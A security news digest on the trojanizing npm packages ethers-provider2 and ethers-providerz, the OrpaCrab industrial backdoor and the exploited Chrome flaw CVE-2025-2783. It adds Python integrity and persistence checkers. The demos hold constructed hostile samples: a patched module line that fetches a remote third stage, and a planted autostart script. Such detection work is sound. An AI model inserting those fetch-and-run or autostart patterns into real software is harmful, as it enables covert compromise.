Malicious NPM Packages Inject Persistent Backdoors into Trusted Libraries
Two newly discovered npm packages, ethers-provider2 and ethers-providerz, were built to compromise trusted libraries already installed in a developer's local environment. Once installed, each package acted as a downloader: it retrieved a second-stage payload from a remote server, executed it, and then deleted the file to limit forensic evidence. The second-stage payload polled the system for the presence of the legitimate ethers package and, once it was found, replaced a core file (provider-jsonrpc.js) with a trojanized version that silently fetched and ran a third-stage payload. That final payload opened a reverse shell to the attacker's server using a modified SSH client, granting remote access while blending in with legitimate traffic.

Because the changes were made directly to the legitimate ethers package rather than to the malicious one, the backdoor survived uninstalling ethers-provider2: removing the dropper leaves the patched ethers files in place. The ethers-providerz package, less effective because of early implementation errors, behaved similarly but targeted the @ethersproject/providers package, attempting to modify another key file, believed to be loader.js, to inject a reverse shell to the same external server. ReversingLabs researchers believe these packages belong to a broader campaign, with two additional packages, reproduction-hardhat and @theoretical123/providers, identified as potentially related.

The goal of the campaign is clear: establish long-term, hard-to-detect persistence in developer environments by corrupting widely used packages. Download counts were low, but the technique marks an escalation in software supply chain attacks, since the malware lives in post-installation modifications to a trusted dependency rather than in the published package, so it evades package-level scanning and survives basic cleanup.
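The defensive check this attack calls for is a per-file integrity baseline of node_modules, since uninstalling the dropper leaves the patched ethers files behind. The following is an added example, not ReversingLabs' code and not part of the original article; the ethers directory layout it builds (lib.commonjs/providers/provider-jsonrpc.js) and the stand-in "trojanized" file content are constructed for the demo and are assumptions.

```python
"""Baseline and re-check the files of an installed npm package.

Added example for the attack above; it is not ReversingLabs' code and not part
of the original article.  Uninstalling ethers-provider2 does not undo the edits
made to ethers itself, so the check that matters is a per-file hash baseline of
node_modules taken right after a clean install.  The ethers layout used in the
demo (lib.commonjs/providers/provider-jsonrpc.js) is constructed and assumed.
"""
import hashlib
import os
import tempfile


def hash_tree(root):
    """Return {relative_path: sha256_hex} for every regular file under root."""
    digests = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            digests[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return digests


def diff_trees(baseline, current):
    """Compare two hash_tree() snapshots and report what changed on disk."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Build a fake ethers install, baseline it, then simulate the in-place patch."""
    with tempfile.TemporaryDirectory() as tmp:
        pkg = os.path.join(tmp, "node_modules", "ethers")
        providers = os.path.join(pkg, "lib.commonjs", "providers")
        os.makedirs(providers)
        target = os.path.join(providers, "provider-jsonrpc.js")
        with open(os.path.join(pkg, "package.json"), "w") as fh:
            fh.write('{"name": "ethers", "version": "6.0.0"}\n')  # constructed stub
        with open(target, "w") as fh:
            fh.write("module.exports = { JsonRpcProvider: class {} };\n")

        baseline = hash_tree(pkg)  # taken right after `npm ci`, stored out of band

        # Constructed stand-in for the second stage: same path, same exports,
        # plus a fetch-and-run of a third stage prepended to the real module.
        with open(target, "w") as fh:
            fh.write(
                "require('https').get('https://example.invalid/stage3', () => {});\n"
                "module.exports = { JsonRpcProvider: class {} };\n"
            )

        return diff_trees(baseline, hash_tree(pkg))
```

Take the baseline right after installing from a reviewed lockfile and keep it outside the project tree. npm checks a package's tarball integrity hash only at install time and never re-verifies files already on disk, so a later rewrite of provider-jsonrpc.js is invisible to `npm ls` and `npm audit`. If the diff reports modified files, do not just uninstall the suspect package: delete node_modules, reinstall with `npm ci`, and treat the host as compromised until the reverse shell has been ruled out.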
OrpaCrab Malware Targets Industrial Systems with Covert Communications
Researchers have identified a new Linux-based backdoor named OrpaCrab that targets industrial systems tied to ORPAK, a company active in fuel station and oil transport technology. First seen in a sample uploaded from the U.S. in early 2024, the malware is tailored to evade detection and maintain access within compromised environments. OrpaCrab persists by placing an autostart script in the /etc/rc3.d/ directory and encrypts its configuration with AES-256-CBC, which makes static and forensic analysis harder. It resolves its command-and-control (C2) domains over DNS over HTTPS (DoH), so the lookups never appear in conventional port-53 DNS logs and bypass DNS-based filtering. Its most notable trait is the use of the MQTT protocol for C2 communication: MQTT is a standard telemetry protocol in industrial environments, so the malicious traffic blends in with legitimate sensor and device messaging.

Further analysis revealed potential ties between OrpaCrab and the CyberAv3ngers threat group, known for attacks on water systems using Unitronics PLCs. In this case, researchers found OrpaCrab embedded in a Gasboy payment terminal, indicating the attackers had access to payment infrastructure with the potential to disrupt fuel services or harvest payment data. The group's shift toward fuel systems suggests a widening scope in its campaign against critical infrastructure. A backdoor that operates quietly over industry-standard protocols raises the stakes for operational technology security, since traditional monitoring often ignores these channels or treats them as trusted. The discovery underscores the need for the energy and transportation sectors to improve visibility into OT environments and secure every communication layer, including DoH and MQTT, not just traditional IT endpoints.
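The persistence mechanism is the easiest part of this backdoor to hunt for on a host. Below is an added example of an /etc/rc3.d audit; it is not from the OrpaCrab research and not part of the original article. It relies on the conventional SysV layout, in which a runlevel directory holds only symlinks named S<NN><service> or K<NN><service> pointing at ../init.d/<service>; the classification rules, the temp-directory layout and the sample entries are this example's own assumptions and are constructed for the demo.

```python
"""Audit a SysV runlevel directory for out-of-place autostart entries.

Added example, not from the OrpaCrab research and not part of the article.
Assumed convention: /etc/rc3.d contains only symlinks named S<NN><service> or
K<NN><service> that resolve into /etc/init.d.  A regular file dropped straight
into the directory, a link that resolves elsewhere, or an entry whose name
breaks the pattern is reported.  The demo tree is constructed in a temp dir.
"""
import os
import re
import tempfile

ENTRY_RE = re.compile(r"^[SK]\d\d.+$")


def audit_rc_dir(rc_dir, init_dir="/etc/init.d"):
    """Return {entry_name: reason} for entries that break the expected layout."""
    findings = {}
    init_dir = os.path.normpath(init_dir)
    for name in sorted(os.listdir(rc_dir)):
        full = os.path.join(rc_dir, name)
        if not ENTRY_RE.match(name):
            findings[name] = "name does not follow the S/K<NN><service> convention"
            continue
        if not os.path.islink(full):
            findings[name] = "regular file instead of a symlink into init.d"
            continue
        target = os.readlink(full)
        if not os.path.isabs(target):  # relative links are resolved from rc_dir
            target = os.path.join(rc_dir, target)
        target = os.path.normpath(target)
        if os.path.dirname(target) != init_dir:
            findings[name] = f"symlink resolves outside init.d: {target}"
    return findings


def demo():
    """Constructed runlevel directory: one legitimate entry, two planted ones."""
    with tempfile.TemporaryDirectory() as tmp:
        init_d = os.path.join(tmp, "etc", "init.d")
        rc3_d = os.path.join(tmp, "etc", "rc3.d")
        os.makedirs(init_d)
        os.makedirs(rc3_d)
        open(os.path.join(init_d, "ssh"), "w").close()
        # Legitimate: relative link into init.d, as update-rc.d would create.
        os.symlink("../init.d/ssh", os.path.join(rc3_d, "S20ssh"))
        # Planted: link whose target lives outside init.d (hypothetical path).
        os.symlink("/opt/.cache/updater", os.path.join(rc3_d, "S99updater"))
        # Planted: a script written directly into rc3.d instead of linked.
        with open(os.path.join(rc3_d, "S99netmon"), "w") as fh:
            fh.write("#!/bin/sh\n/usr/lib/.x/agent &\n")  # constructed content
        return audit_rc_dir(rc3_d, init_dir=init_d)


if __name__ == "__main__":
    for entry, reason in demo().items():
        print(f"{entry}: {reason}")
```

Run `audit_rc_dir("/etc/rc3.d")` on a live system and review every finding against package ownership (`dpkg -S` or `rpm -qf` on the link target). The check still matters on systemd hosts, because systemd-sysv-generator honours /etc/rcN.d links for legacy init scripts. It covers only the persistence side; the DoH and MQTT channels need network telemetry, at minimum an allowlist of expected MQTT brokers and alerts on TLS connections to public DoH resolvers from OT devices that have no business using them.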
Chrome Zero-Day Exploited in Operation ForumTroll Targeting Russian Organizations
Google has issued an out-of-band patch for a critical Chrome vulnerability, tracked as CVE-2025-2783, that was actively exploited in a targeted espionage campaign dubbed Operation ForumTroll. Discovered by Kaspersky researchers, the flaw stems from an "incorrect handle" being provided in Mojo, Chrome's inter-process communication layer, on Windows, which let attackers escape the browser's sandbox entirely. The escape was triggered when victims opened personalized phishing emails posing as invitations to the "Primakov Readings" forum and followed the link to a malicious website; from that point the infection required no further interaction. The campaign was narrowly targeted at Russian media outlets, educational institutions, and government bodies, and the short-lived, per-target phishing links made the attacks difficult to detect and analyze.

Kaspersky confirmed that a second, unidentified exploit was chained with CVE-2025-2783 to achieve remote code execution, but that component has not been recovered, so it cannot be confirmed as fixed. The combination of a sandbox escape with a separate remote code execution exploit points to a sophisticated and likely state-sponsored actor. Although Google has released few technical details, the coordinated disclosure and rapid rollout of Chrome 134.0.6998.178 closed the sandbox escape and broke this exploit chain. The malware used in these attacks had functionality consistent with long-term surveillance, reinforcing the espionage motive. Users of other Chromium-based browsers, including Edge, Brave, Opera, and Vivaldi, should apply their vendors' updates as soon as they ship, since those browsers share the affected Mojo code.